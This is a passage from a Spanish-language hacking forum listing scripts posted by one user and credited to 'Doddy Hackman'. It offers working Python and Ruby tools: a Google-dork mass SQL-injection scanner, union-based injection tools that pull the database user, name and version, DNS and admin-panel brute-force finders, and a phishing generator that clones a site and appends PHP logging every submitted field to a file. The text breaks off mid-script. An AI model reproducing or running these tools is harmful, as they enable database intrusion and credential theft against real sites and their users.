Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - BigBear

Páginas: 1 ... 18 19 [20]
381
Python / [Python] Google Inyector By dODDY h
« en: Julio 03, 2011, 09:34:58 pm »
Bueno , acabo de hacer un scanner de sqli.

Este busca en google paginas con un dork marcado por ustedes
, para despues borrar repetidos y scanear las webs encontradas


Código: Python
  1. #!usr/bin/python
  2. #Google Iny (C) Doddy Hackman 2011
  3.  
  4.  
  5. import urllib2,re,os,sys
  6.  
  7.  
  8. def head():
  9.  print "\n\n -- == Google Iny == --\n"
  10.  
  11. def copyright():
  12.  print "\n(C) Doddy Hackman 2011\n"
  13.  sys.exit(1)
  14.  
  15.  
  16. def toma(web) :
  17.  nave = urllib2.Request(web)
  18.  nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
  19.  op = urllib2.build_opener()
  20.  return op.open(nave).read()
  21.  
  22.  
  23. def show():
  24.  print "\n<ul class="bbc_list"><li type="square"> Sintax : ",sys.argv[0]," <dork> <count>\n"[/li][/list]
  25.  
  26. def limpiar(pag):
  27.  
  28.  limpia = []
  29.  for p in pag:
  30.   if not (re.findall("[url]http://www.google.com.ar[/url]",p,re.I)):
  31.    if p not in limpia:
  32.     limpia.append(p)
  33.  return limpia
  34.  
  35.  
  36. def sql(webs):
  37.  for web in webs :
  38.   if re.findall("=",web):
  39.    web = re.split("=",web)
  40.    web = web[0]+"="
  41.    try:
  42.     code = toma(web+"-1+union+select+1--")
  43.     if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  44.      print "[SQLI] : ",web,"\n"
  45.    except:
  46.     pass
  47.  
  48. def scan(dork,count):
  49.  pag = []
  50.  s = 10  
  51.  while s <= int(count):
  52.   try:
  53.    code = toma("[url]http://www.google.com.ar/search?hl=&q=[/url]"+str(dork)+"&start="+repr(s))
  54.    d = re.findall("(?<=\"r\"><. href=\")[^\"]+",code)
  55.    s += 10
  56.    for a in d:
  57.     pag.append(a)
  58.   except:
  59.    copyright()
  60.  pag = limpiar(pag)
  61.  
  62.  return pag
  63.  
  64. head()
  65.  
  66. if len(sys.argv) != 3:
  67.  show()
  68. else :
  69.  print "\n</li><li type="square"> SQL Scan Started\n"[/li][/list]
  70.  print "</li><li type="square"> Dork : ",sys.argv[1][/li][/list]
  71.  print "</li><li type="square"> Count : ",sys.argv[2][/li][/list]
  72.  pages = scan(sys.argv[1],sys.argv[2])
  73.  print "\n</li><li type="square"> Webs Found : ",len(pages),"\n"[/li][/list]
  74.  sql(pages)
  75.  
  76. copyright()
  77.  

382
Python / [Python] Fuzz DNS By Doddy H
« en: Julio 03, 2011, 09:34:47 pm »
Hola a todos.

Aca les dejo un simple buscador de dns , solo ponen el dominio y esta cosita se encarga de buscarlas.

Código: Python
  1. #!usr/bin/python
  2. #LFI T00l (C) Doddy Hackman
  3.  
  4. import os,sys,urllib2,re
  5.  
  6. dns = ['www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc']
  7.  
  8. def header() :
  9.  print "\n--== Fuzz DNS ==--\n"
  10.  
  11. def copyright() :
  12.  print "\n\n(C) Doddy Hackman 2010\n"
  13.  exit(1)
  14.  
  15. def show() :
  16.  print "\n<ul class="bbc_list"><li type="disc"> Sintax : ",sys.argv[0]," <web>\n"[/li][/list]
  17.  
  18. def toma(web) :
  19.  return urllib2.urlopen(web).read()
  20.  
  21.  
  22. def search(web):
  23.  print "\n</li><li type="square"> Searching DNS in",web,"\n"[/li][/list]
  24.  try:
  25.   for d in dns:
  26.    toma("http://"+d+"."+web)
  27.    print "[DNS Link] : http://"+d+"."+web
  28.  except:
  29.   pass
  30.  
  31. header()
  32.  
  33. if len(sys.argv) != 2 :
  34.  show()
  35.  
  36. else :
  37.  search(sys.argv[1])
  38.  
  39. copyright()
  40.  
  41.  
  42. #The End
  43.  


Ejemplo de uso


Código: You are not allowed to view links. Register or Login
C:/Users/dODDYh/Desktop/Arsenal X parte 2>fuzzdns.py google.com


--== Fuzz DNS ==--


  • Searching DNS in google.com[/li]

    [DNS Link] : [url]http://www.google.com[/url]

    (C) Doddy Hackman 2010





  • 383
    Python / [Python] FTP Manager
    « en: Julio 03, 2011, 09:34:36 pm »
    Hola

    Aca traigo un simple cliente FTP

    Código: Python
    1. #!usr/bin/python
    2. #FTP Manager 0.2 (C) Doddy Hackman 20111
    3.  
    4. from ftplib import FTP
    5. import sys
    6.  
    7.  
    8. def head():
    9.  print "\n -- == FTP Manger == --\n\n"
    10.  
    11. def copyright():
    12.  print "\n\n(C) Doddy Hackman 2011\n"
    13.  sys.exit(1)
    14.  
    15. def show():
    16.  print "\nSintax : "+sys.argv[0]+" <host> <user> <pass>\n"
    17.  
    18. def menu():
    19.  print "\n"
    20.  print "1 : dir"
    21.  print "2 : cwd"
    22.  print "3 : chdir"
    23.  print "4 : delete dir"
    24.  print "5 : delete file"
    25.  print "6 : rename file"
    26.  print "7 : make directory"
    27.  print "8 : size"
    28.  print "9 : abort\n\n"
    29.  op = input("[Option] : ")
    30.  return op
    31.  
    32.  
    33. def enter(host,user,password):  
    34.  print "<ul class="bbc_list"><li type="square"> Connecting to ",host,"\n"[/li][/list]
    35.  enter = FTP(host,user,password)
    36.  print "\n</li><li type="square"> Enter in the system\n"[/li][/list]
    37.  
    38.  def menu2():
    39.   op = menu()
    40.   if op == 1:
    41.    try:
    42.     lista = enter.dir()
    43.     for a in lista:
    44.      print a
    45.     menu2()
    46.    except:
    47.     menu2()
    48.   elif op == 2:
    49.    try:
    50.     print "\n\n</li><li type="square"> Path : "+enter.pwd()+"\n\n"[/li][/list]
    51.     menu2()
    52.    except:
    53.     menu2()
    54.   elif op == 3:
    55.    try:
    56.     dir = raw_input("\n\n[Directory] : ")
    57.     enter.cwd(dir)
    58.     print "\n\n</li><li type="square"> Directory Changed\n\n"[/li][/list]
    59.     menu2()
    60.    except:
    61.     menu2()
    62.   elif op == 4:
    63.    try:
    64.     dir = raw_input("\n\n[Directory] : ")
    65.     enter.rmd(dir)
    66.     print "\n\n</li><li type="square"> Directory Deleted\n\n"[/li][/list]
    67.     menu2()
    68.    except:
    69.     menu2()
    70.   elif op == 5:
    71.    try:
    72.     file = raw_input("\n\n[File] : ")
    73.     enter.delete(file)
    74.     print "\n\n</li><li type="square"> File Deleted\n\n"[/li][/list]
    75.     menu2()
    76.    except:
    77.     menu2()
    78.   elif op == 6:
    79.    try:
    80.     oldfile = raw_input("\n\n[Name] : ")
    81.     newfile = raw_input("\n[New Name] : ")
    82.     enter.rename(oldfile,newfile)
    83.     print "\n\n</li><li type="square"> Name Changed\n\n"[/li][/list]
    84.     menu2()
    85.    except:
    86.     menu2()
    87.   elif op == 7:
    88.    try:
    89.     dir = raw_input("\n\n[New Directory] : ")
    90.     enter.mkd(dir)
    91.     print "\n\n</li><li type="square"> Directory Created\n\n"[/li][/list]
    92.     menu2()
    93.    except:
    94.     menu2()
    95.   elif op == 8:
    96.    try:
    97.     file = raw_input("\n\n[File] : ")
    98.     peso = enter.size(file)
    99.     print "\n\n</li><li type="square"> ",peso," KB \n\n"[/li][/list]
    100.     menu2()
    101.    except:
    102.     menu2()
    103.   elif op == 9:
    104.    enter.quit()
    105.    copyright()
    106.  
    107.   else:
    108.    menu2()      
    109.  menu2()
    110.  
    111.  
    112.  
    113. head()
    114.  
    115. if len(sys.argv) != 4:
    116.  show()
    117. else:
    118.  enter(sys.argv[1],sys.argv[2],sys.argv[3])
    119.  
    120. copyright()
    121.  
    122.  

    384
    Python / [Python] Finder Admin By Doddy H
    « en: Julio 03, 2011, 09:34:25 pm »
    Hola a todos.

    Hoy termine un script en python para buscar el famoso panel de administraction

    Código: Python
    1. #!usr/bin/python
    2. #Finder Admin (C) Doddy Hackman
    3.  
    4. import sys,httplib,os
    5.  
    6. os.system("cls")
    7.  
    8. panels=['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
    9.  
    10. def header() :
    11.  print "\n--== Finder Admin ==--\n"
    12.  
    13. def copyright() :
    14.  print "\n\n(C) Doddy Hackman 2010\n"
    15.  exit(1)
    16.  
    17. header()
    18.  
    19. def show() :
    20.  print "\n<ul class="bbc_list"><li type="disc"> Sintax : ",sys.argv[0]," <web>\n"[/li][/list]
    21.  
    22. def toma(web,path):
    23.  nave = httplib.HTTPConnection(web)
    24.     nave.request("GET","/"+path)
    25.  return nave.getresponse().status  
    26.  
    27. def buscar(web):
    28.  print "\n</li><li type="square"> Target : ",web,"\n\n"[/li][/list]
    29.  for path in panels:
    30.   try:
    31.    code = toma(web,path)
    32.    if code ==200:
    33.     print "[Link] : "+web+"/"+path
    34.   except(KeyboardInterrupt):
    35.    copyright()
    36.   except:
    37.    pass
    38.  
    39. if len(sys.argv) != 2 :
    40.  show()
    41.  
    42. else:
    43.  buscar(sys.argv[1])
    44.  
    45. copyright()
    46.  
    47.  
    48. #The End
    49.  

    Un ejemplo de uso seria

    Código: You are not allowed to view links. Register or Login
    python finder.py 127.0.0.1

    Código: You are not allowed to view links. Register or Login
    --== Finder Admin ==--


  • Target :  127.0.0.1[/li]


    [Link] : 127.0.0.1/admin/
    [Link] : 127.0.0.1/login.php
    [Link] : 127.0.0.1/phpmyadmin/


    (C) Doddy Hackman 2010

    Eso si no usen http:// en la web que quieran escanear , ejemplo You are not allowed to view links. Register or Login


  • 385
    Python / [Python] Easy Inyector By Doddy H
    « en: Julio 03, 2011, 09:34:16 pm »
    Bueno esta es la primera version de este simple programa que hice en perl , en
    la siguiente version le agregare otras cosas y podra scanear varios en un archivo de texto.

    Esta cosa busca:

    * Vulnerabilidad (obvio)
    * Limite de columnas
    * Informacion sobre la base de datos
    * Automaticamente buscar el numero que permite mostrar informacion
    * Verifica existencia de mysql.user y information.schema.tables



    Código: Python
    1. #!usr/bin/python
    2. #Easy Inyector (C) Doddy Hackman 2010
    3.  
    4. import os,sys,urllib2,re
    5.  
    6.  
    7. def clean():
    8.  if sys.platform=="win32":
    9.   os.system("cls")
    10.  else:
    11.   os.system("clear")
    12.  
    13.  
    14. def header() :
    15.  print "\n--== Easy Inyector ==--\n"
    16.  
    17. def copyright() :
    18.  print "\n\n(C) Doddy Hackman 2010\n"
    19.  sys.exit(1)
    20.  
    21. def show() :
    22.  print "\n<ul class="bbc_list"><li type="disc"> Sintax : ",sys.argv[0]," <web>\n"[/li][/list]
    23.  
    24. def toma(web) :
    25.  return urllib2.urlopen(web).read()
    26.  
    27. def bypass(bypass):
    28.  if bypass == "--":
    29.   return("+","--")
    30.  elif bypass == "/*":
    31.   return("/**/","/*")
    32.  else:
    33.   return("+","--")
    34.  
    35. def more(web,passx):
    36.  pass1,pass2 = bypass(passx)
    37.  print "\n</li><li type="square"> Searching more data\n"[/li][/list]
    38.  web1 = re.sub("hackman","concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)",web)
    39.  code0 = toma(web1)
    40.  if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
    41.   datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
    42.   datar = re.split("K0BRA",datax[0])
    43.   print "</li><li type="square"> Username :",datar[1][/li][/list]
    44.   print "</li><li type="square"> Database :",datar[2][/li][/list]
    45.   print "</li><li type="square"> Version :",datar[3],"\n"[/li][/list]
    46.  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    47.  if (re.findall("K0BRA",code1)):
    48.    print "</li><li type="square"> mysql.user : on" [/li][/list]
    49.  code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    50.  if (re.findall("K0BRA",code2)):
    51.    print "</li><li type="square"> information_schema.tables : on"[/li][/list]
    52.  
    53. def findlength(web,passx):
    54.  pass1,pass2 = bypass(passx)
    55.  print "\n</li><li type="square"> Finding columns length"[/li][/list]
    56.  number = "concat(0x4b30425241,1,0x4b30425241)"
    57.  for te in range(2,30):
    58.   number = str(number)+","+"concat(0x4b30425241,"+str(te)+",0x4b30425241)"
    59.   code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
    60.   if (re.findall("K0BRA(.*?)K0BRA",code)):
    61.    numbers = re.findall("K0BRA(.*?)K0BRA",code)  
    62.    print "</li><li type="square"> Column length :",te[/li][/list]
    63.    print "</li><li type="square"> Numbers",numbers,"print data"[/li][/list]
    64.    sql = ""
    65.    tex = te + 1
    66.    for sqlix in range(2,tex):
    67.     sql = str(sql)+","+str(sqlix)
    68.     sqli  = str(1)+sql
    69.    sqla = re.sub(numbers[0],"hackman",sqli)
    70.    more(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
    71.    print "\n</li><li type="square"> Scan Finished\n"[/li][/list]
    72.    sys.exit(1)
    73.  print "[-] Length dont found\n"
    74.    
    75.    
    76. def scan(web,passx):
    77.  pass1,pass2 = bypass(passx)
    78.  print "\n</li><li type="square"> Testing vulnerability"[/li][/list]
    79.  code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
    80.  if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
    81.   print "</li><li type="square"> SQLI Detected"[/li][/list]
    82.   findlength(web,passx)
    83.  else:
    84.   print "[-] Not Vulnerable"
    85.   copyright()
    86.  
    87.  
    88. header()
    89.  
    90. if len(sys.argv) != 2 :
    91.  show()
    92.  
    93. else :
    94.  try:
    95.   scan(sys.argv[1],"--")
    96.  except:
    97.   copyright()
    98.  
    99.  
    100. #The End
    101.  
    102.  



    Ejemplo de uso

    Código: You are not allowed to view links. Register or Login

    C:/Users/DoddyH/Desktop/Arsenal X parte 2>sqli.py [url]http://127.0.0.1/sql.php?id=[/url]


    --== Easy Inyector ==--


  • Testing vulnerability[/li]
  • SQLI Detected[/li]

  • Finding columns length[/li]
  • Column length : 3[/li]
  • Numbers ['1', '2', '3'] print data[/li]

  • Searching more data[/li]

  • Username : [email protected][/li]
  • Database : hackman[/li]
  • Version : 5.1.41[/li]

  • mysql.user : on[/li]
  • information_schema.tables : on[/li]

  • Scan Finished[/li][/list]



    (C) Doddy Hackman 2010




  • 386
    Python / [Python] Console By Doddy H
    « en: Julio 03, 2011, 09:34:00 pm »
    Bueno este es un simple ejecutor de comandos hecho en tk

    Código: Python
    1. #!usr/bin/python
    2. #Console (C) Doddy Hackman 2011
    3.  
    4. from Tkinter import *
    5. import subprocess  
    6.  
    7. global x
    8.  
    9. def execa() :
    10.   re = subprocess.Popen(cmd.get(),shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
    11.   if re:
    12.    panel.insert(END,re.stdout.read())
    13.   else:
    14.    panel.insert(END,re.stderr.read())
    15.    
    16.  
    17. window = Tk()
    18. window.title("Console (C) Doddy Hackman 2011")
    19.  
    20. window.maxsize(width="400",height="320")
    21. window.minsize(width="400",height="320")
    22.  
    23. window.configure(background="black")
    24. window.configure(cursor="tcross")
    25.  
    26. cmd = StringVar()
    27. panel = Text(window,width=30,height=15,bg="black",fg="green")
    28.  
    29. Label(window,bg="black").grid(row=1)
    30. Label(window,text="Command : ",bg="black",fg="green").grid(row=3,column=4)
    31.  
    32. entry = Entry(window,width=35,textvariable=cmd,bg="black",fg="green").grid(row=3,column=5)
    33.  
    34. Button(text="Cargar",bg="black",fg="green",activebackground="green",command=execa).grid(row=3,column=9)
    35.  
    36.  
    37. Label(window,bg="black").grid(row=4)
    38. panel.grid(row=10,column=5)  
    39.  
    40.  
    41. window.mainloop()
    42.  
    43.  
    44.  

    387
    Ruby / [Ruby] SQLI Scanner
    « en: Julio 03, 2011, 09:33:07 pm »
    Un scanner de SQLI en ruby

    Código: Ruby
    1. #!usr/bin/ruby
    2. #SQLI Scannerl (C) Doddy Hackman 2010
    3. #contact me : doddy-hackman.blogspot.com
    4.  
    5. require 'net/http'
    6.  
    7.  
    8. def uso
    9.   print "\n<ul class="bbc_list"><li type="square"> sqli.rb <site>\n"[/li][/list]
    10. end
    11.  
    12. def toma(host,path)
    13.   http = Net::HTTP.new(host,80)
    14.   return http.get(path).body
    15. end
    16.  
    17. def details(web,more)
    18. web1 = more.sub(/hackman/,"0x4b30425241")
    19. more = more.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
    20. print "\n\n</li><li type="square"> Extrating information of the DB\n\n"[/li][/list]
    21. url = URI.parse(web)
    22. code = toma(url.host,url.path+"?"+url.query+more)
    23. if code=~/K0BRA(.*?)K0BRA(.*?)K0BRA(.*?)K0BRA/
    24.   print "[username] : "+$1+"\n"
    25.   print "[database] : "+$2+"\n"
    26.   print "[version] : "+$3+"\n\n"
    27.  
    28. test1 = toma(url.host,url.path+"?"+url.query+web1+"+from+information_schema.tables")
    29. test2 = toma(url.host,url.path+"?"+url.query+web1+"+from+mysql.user")
    30.  
    31. if test1=~/K0BRA/
    32.   print "[information_schema.tables] : ON\n"
    33. end
    34.  
    35. if test2=~/K0BRA/
    36.  print "[mysql.user] : ON"
    37. end
    38.  
    39.  
    40. else
    41.   print "\n[-] Not Found\n\n"
    42. end
    43. end
    44.  
    45.  
    46. def scan(web)
    47. print "\n</li><li type="square"> Testing the vulnerability SQLI...\n\n"[/li][/list]
    48. url = URI.parse(web)
    49. codetest = toma(url.host,url.path+"?"+url.query+"-1+union+select+1")
    50. if codetest=~/The used SELECT statements have a different number of columns/
    51.   print "</li><li type="square"> SQLI Detected\n\n"[/li][/list]
    52.   else
    53.   print "[-] Not Vulnerable to SQLI\n\n"
    54.   copyright()
    55. end
    56.  
    57. z = "1"
    58. x = "concat(0x4b30425241,1,0x4b30425241)"
    59. for num in ('2'..'25')
    60. z = z+","+num
    61. x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
    62. #print url.host,url.path+"?"+url.query+"-1+union+select+"+x+"\n"
    63. code = toma(url.host,url.path+"?"+url.query+"-1+union+select+"+x)
    64. if code=~/K0BRA(.*?)K0BRA/
    65. print "</li><li type="square"> The Page has "+num+" columns\n"[/li][/list]
    66. print "</li><li type="square"> The number "+$1+" print data\n\n"[/li][/list]
    67. z = z.sub($1,"hackman")
    68. print "[SQLI] : "+web+"-1+union+select+"+z
    69. details(web,"-1+union+select+"+z)
    70. copyright()
    71. end
    72. end
    73. print "\n\n[-] Not Found the numbers of the columns\n\n"
    74. copyright()
    75. end
    76.  
    77. def head()
    78.   print "\n\n -- == SQLI Scanner == --\n\n"
    79. end
    80.  
    81. def copyright()
    82.    print "\n\n\n(C) Doddy Hackman 2010\n\n"
    83.    exit(1)
    84.  end
    85.  
    86. head()
    87. if !ARGV[0]
    88.   uso()
    89. else
    90.   scan(ARGV[0])
    91.   copyright()  
    92. end
    93. copyright()
    94.  
    95. #The End ?
    96.  

    388
    Ruby / [Ruby] Phishing Gen
    « en: Julio 03, 2011, 09:32:52 pm »
    Un generador de fakes

    Código: Ruby
    1. #!usr/bin/ruby
    2. #PHishing Gen (C) Doddy Hackman 2010
    3. #contact me : doddy-hackman.blogspot.com
    4.  
    5. require 'net/http'
    6.  
    7. def uso
    8.   print "\n<ul class="bbc_list"><li type="square"> fake.rb <site> <result>\n"[/li][/list]
    9. end
    10.  
    11. def toma(web)
    12.    return Net::HTTP.get(web)
    13.    end
    14.  
    15. def savefile(filename,text)
    16. files = File.open(filename,'a')
    17. files.puts text
    18. end
    19.  
    20. def gen(web,file,magic)
    21.   print "\n\n</li><li type="square"> Getting the source...\n"[/li][/list]
    22.   begin
    23.   code = toma(URI.parse(web))
    24.   savefile(file,code+"\n"+magic)
    25.   print "</li><li type="square"> Finish"[/li][/list]
    26.   copyright()
    27.   end
    28. end
    29.  
    30. def head()
    31.   print "\n\n -- == Phising Gen == --\n\n"
    32. end
    33.  
    34. def copyright()
    35.    print "\n\n\n(C) Doddy Hackman 2010\n\n"
    36.    exit(1)
    37.  end
    38.  
    39. head()
    40. if !ARGV[0] and !ARGV[1]
    41.   uso()
    42. else
    43.   text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>'
    44.   gen(ARGV[0],ARGV[1],text)  
    45. end
    46. copyright()
    47.  
    48.  

    389
    Ruby / [Ruby] Panel Control
    « en: Julio 03, 2011, 09:32:42 pm »
    Un buscador de panel de administracion

    Código: Ruby
    1. #!usr/bin/ruby
    2. #Panel cONTROL (C) Doddy Hackman 2010
    3. #contact me : doddy-hackman.blogspot.com
    4.  
    5. panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
    6.  
    7. require 'net/http'
    8.  
    9.  
    10. def uso
    11.   print "\n<ul class="bbc_list"><li type="square"> panelcontol.rb <site>\n"[/li][/list]
    12. end
    13.  
    14. def toma(web)
    15.    return Net::HTTP.get_response(web)
    16.    end
    17.  
    18.  
    19. def scan(web,panels)
    20.   print "\n</li><li type="square"> Starting the scan...\n\n\n"[/li][/list]
    21.   panels.each do |panel|
    22.   begin
    23.   begin
